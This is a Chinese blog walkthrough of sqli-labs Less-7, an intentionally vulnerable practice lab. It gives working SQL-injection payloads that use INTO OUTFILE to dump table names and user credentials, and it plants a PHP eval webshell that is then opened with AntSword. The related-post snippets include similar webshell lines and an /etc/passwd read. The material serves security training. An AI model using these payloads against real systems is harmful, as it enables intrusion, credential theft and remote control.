[网络安全]sqli-labs Less-7 解题详析

已于 2024-07-30 18:37:20 修改
阅读量2.5k 收藏 1
点赞数
分类专栏: # Sqli-Labs靶场攻防实战 文章标签: web安全 网络安全 数据库 sqlilabs sql
于 2023-07-23 09:45:39 首次发布
该原创文章未经本人许可,不得用于商业用途。未经授权不得转载,否则保留追究法律责任的权利。
本文链接:https://blog.csdn.net/2301_77485708/article/details/131726309
版权
本文详细介绍了INTOOUTFILE命令在MySQL中的用法,以及如何通过它来识别SQL注入点,判断注入类型。文章展示了如何利用这种注入技术查询数据库信息,包括库名、表名、列名,并能通过创建一句话木马进行远程控制。此外,还讨论了在无法直接访问导出文件时,如何使用蚁剑进行远程连接。
摘要由CSDN通过智能技术生成

文章目录

into outfile

开始做题前,先了解一下什么是into outflie命令

INTO OUTFILE 命令是用于将查询结果写入到一个文件中的 MySQL 查询语句。它可以将查询结果保存为文本文件,供进一步处理或导出使用。

以下是 INTO OUTFILE 命令的基本语法:

SELECT column1, column2, ...
INTO OUTFILE 'filename'
FROM table_name
WHERE condition;
  • column1, column2, ...:要选择的列。
  • 'filename':指定要输出的文件路径和名称。注意,MySQL 服务器必须有写入该文件的权限,并且必须是绝对路径。
  • table_name:要查询的数据库表名。
  • WHERE condition:可选,用于筛选查询结果的条件。

例如,假设我们有一个名为 customers 的数据库表,其中包含 nameemail 列。如果要将符合特定条件的数据输出到文件中,可以使用以下查询:

SELECT name, email
INTO OUTFILE '/qiu.txt'
FROM customers
WHERE age > 30;

这将把年龄大于 30 的客户的姓名和电子邮件输出到 /qiu.txt 文件中。

判断注入类型

在这里插入图片描述
单引号回显error

尝试双引号:

在这里插入图片描述

但输入?id=1" and 1=2 --+时仍正常回显:

在这里插入图片描述

说明不是单纯的单引号/双引号注入

常用的闭合符号

SQL语句原代码:
'$id'
"$id"
('$id')
("$id")
(('id'))
 
闭合代码:
1' #
1" #
1') #
") #
')) #

?id=1')) and 1=1 --+ 回显正常

在这里插入图片描述
?id=1')) and 1=2 --+ 回显错误

在这里插入图片描述

可判断注入语句为$sql="SELECT * FROM users WHERE id=(('$id'))";

判断注入点个数

GET1')) order by 3 --+,回显如下:

在这里插入图片描述

GET1')) order by 4 --+,回显如下:

在这里插入图片描述

故注入点为3个

查库名

联合查询(注入点为3)+into outfile

我们写入文件时,应选择数据库中有写入权限的目录

模板:?id=1')) union select (sql语句) into outfile '路径' --+

于是构造:?id=1')) union select 1,2,database() into outfile 'D:\\Software\\PHPStudy\\phpStudy_64\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\1.txt' --+

执行该语句后访问D:\\Software\\PHPStudy\\phpStudy_64\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\目录,打开1.txt文件,得到导出的数据库名

注意:payload中目录的分隔符可以是\、//、/ 但不能是 \

在这里插入图片描述

查表名

Payload:?id=1')) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() into outfile 'D:\\Software\\PHPStudy\\phpStudy_64\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\2.txt' --+

步骤同上:

在这里插入图片描述

查users表的列名

Payload:?id=1')) union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database() into outfile 'D:\\Software\\PHPStudy\\phpStudy_64\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\3.txt' --+

步骤同上:

在这里插入图片描述

查字段

Payload:?id=1')) union select 1,group_concat(username),group_concat(password) from users into outfile 'D:\\Software\\PHPStudy\\phpStudy_64\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\4.txt' --+

获取账号及密码,步骤同上:

在这里插入图片描述

如果我们并不能直接从本机的目录上访问这些txt文件,该怎么办?

既然我们可以上传文件,同样地,也可以一句话连接蚁剑

模板:?id=1')) union select 1,2,'一句话木马' into outfile '路径\\a.php' --+(三个注入点)

Payload:?id=1')) union select 1,2,'<?php eval($_POST[qiushuo]);?>' into outfile 'D:\\Software\\PHPStudy\\phpStudy_64\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\a.php' --+

在这里插入图片描述
然后删除非必要的代码

在这里插入图片描述
连接蚁剑:

在这里插入图片描述
访问txt文件:

在这里插入图片描述

秋说
关注
专栏目录
Sqli-labs靶场第7关详解[Sqli-labs-less-7]
m0_73615178的博客
02-22 2123
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1430
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
sqli-labs-master 第七关详解
weixin_39464539的博客
05-06 1668
靶机环境:win10 phpstudy 2018 路径C:\phpStudy\PHPTutorial\WWW\sqli-labs-master\Less-7 首先,输入id参数,尝试寻找注入点 构造 ?id=1 显示正常 ?id=1' 显示异常 ?id=1')--+显示异常 ?id=1')) --+显示正常 由此判断源码闭合为 "((id')) 2.判断字段数量 ?id=1')) order by...
7.sqli-labs-Less7
qwsn
03-29 1800
Less 7 GET-Dump into outfile-String 1、根据提示:是把字段值写入一个可以输出的文本+字符串类型注入 ①、找闭合类型(看源码) ②、查看目录结构(使用第一关的@@basedir或者@@datadir,或者直接看靶机吧) 2、一直回显查You are in… Use outfile…,很难找出闭合类型; ①看Less7的index.php下的源码:SELECT * ...
sqlilabs—less7
一个普普通通的博客
03-24 2612
sqlilabs—less7
Sqli-labs Less7
orchid_sea的博客
07-24 1262
这里还有一个需要了解的点就是在mysql5.5版本之前secure_file_priv这个值是默认为空的,那么我们拿到的webshell如果对应的mysql数据库版本在5.5以下的话操作起来就比较方便,在mysql5.5版本之后secure_file_priv这个值是默认为NULL的,即不能够往数据库内写入文件。/tmp的意思是只能在/tmp目录下写入文件,这种情况下就需要考虑写入文件到文件夹后能否在网页上访问连接到这个目录,在MYSQL的bin目录下进入cmd,查看MySQL的权限设置。...
sqli-labs (less-7)
kukudeshuo的博客
03-07 482
sqli-labs (less-7) 补充知识 load_file()函数读文件操作 例:select load_file('/etc/passwd') into outfile写文件操作 例:select '<?php phpinfo();?>' into outfile 'c:\wwwroot\1.php' 一句话木马 php的一句话木马: <?php @eval($_POST['icepeak']);?> asp的一句话是: <%eval request ("icep
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个关于SQL注入(SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
Sqli-labs less 7
weixin_34419321的博客
08-11 295
Less-7 本关的标题是dump into outfile,意思是本关我们利用文件导入的方式进行注入。而在background-3中我们已经学习了如何利用dump into file. 这里首先还是回到源代码中去。重点放在对id参数的处理和sql语句上,从源代码中可以看到$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1"; 这里对...
sqli-labs-master第七关Less-7超详细360°无死角教程
hih30250的博客
11-25 1350
不带参数请求页面:可以看到,页面让我们输入id,我们输入一个?id=1作为参数:可以看到给出了正常的数据。我们再输入一个不存在的id参数?id=999可以看到页面给出SQL语句语法错误。
sqli-labs ---- Less-7
Nixawk
05-31 2599
Errcode: 13 说明写入文件失败,主要原因是因为Apache权限为www-data,而目录的权限是root。(Apache无写入权限). 测试将文件写入系统临时目录,如下所示(已经写过一边,所以提示文件已存在): Less -7 实际应用如下所示: 对文件进行访问时,一定要确认具备相应的权限。
SQLI_LAB——Less7~15
weixin_34050005的博客
05-25 183
  LESS-7   上题。 http://localhost:81/SQLI-LABS/sqli-labs-master/Less-7/?id=1' --+      单引号发现报错,但不是外显,所以无法直接进行剥离构造。没有外显的话比较麻烦,通过尝试得到: http://localhost:81/SQLI-LABS/sqli-labs-master/Less-7/?...
sqli-lab教程Less-7
Brucye
03-23 478
Less-7 将一句话木马写入目录中,使用中国菜刀连接,拿到shell。 1.开启写入权限 使用show variables like '%secure%'在MySQL命令行中判断 show variables like '%secure%'; 如果这里为Null就没有写入权限 2.如何修改本地写入权限 通过修改 MySQL 下的 my.ini 配置文件就可以启用权限,需要把下面这个字符串写入文件中。 secure_file_priv="/" 再次查看此参数,若参数值不为 null 则修改成功。 3
sqli-labs 靶场 less-7 第七关详解:OUTFILE注入与配置
最新发布
Superstacks超全栈
06-09 546
SQLi-Labs是一个用于学习和练习SQL注入漏洞的开源应用程序。通过它,我们可以学习如何识别和利用不同类型的SQL注入漏洞,并了解如何修复和防范这些漏洞。经尝试竟然还需要两个括号才能显示正常。整个过程都没有错误提示或数据显示,那我们只能使用布尔注入来测试了。只有列号为3的时候,才能正常显示,则字段长度为3。进入页面中,并输入数据查看结果。输入单引号会提示语法问题。发现空数据提示语法问题。
Sqli-labs之Less-7
m0_46315342的博客
06-04 3331
                                          &nbs...
SQLi LABS Less-7 布尔盲注
热门推荐
wangyuxiang946的博客
04-01 1万+
SQLi 第七关,sqli-labs less-7,sqlilabs less 7
sqli-labs:less-7
羽的博客
07-14 322
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; char...
sqli-labs Less-7
08-28
SQLi-Labs是一个用于学习和练习SQL注入的在线平台,其中包含了多个不同的注入场景。Less-7是其中的一个场景,它主要讲解的是SQL注入的基础知识。 在Less-7中,我们需要通过注入来绕过登录认证,获取到管理员的权限。具体步骤如下: 1. 打开SQLi-Labs平台,并选择Less-7场景。 2. 在登录框中输入任意用户名和密码,然后点击登录按钮。 3. 拦截登录请求,使用Burp Suite等工具修改POST请求的参数。 4. 在密码字段中尝试注入Payload,例如:'or '1'='1。 5. 发送修改后的请求,查看服务器返回的响应。 6. 如果成功绕过认证,系统会显示管理员页面。 请注意,在实际应用中,SQL注入是一种严重的安全漏洞,攻击者可以利用它来执行恶意操作。因此,保护应用程序免受SQL注入攻击至关重要。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

秋说

感谢打赏,祝你平安喜乐。

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值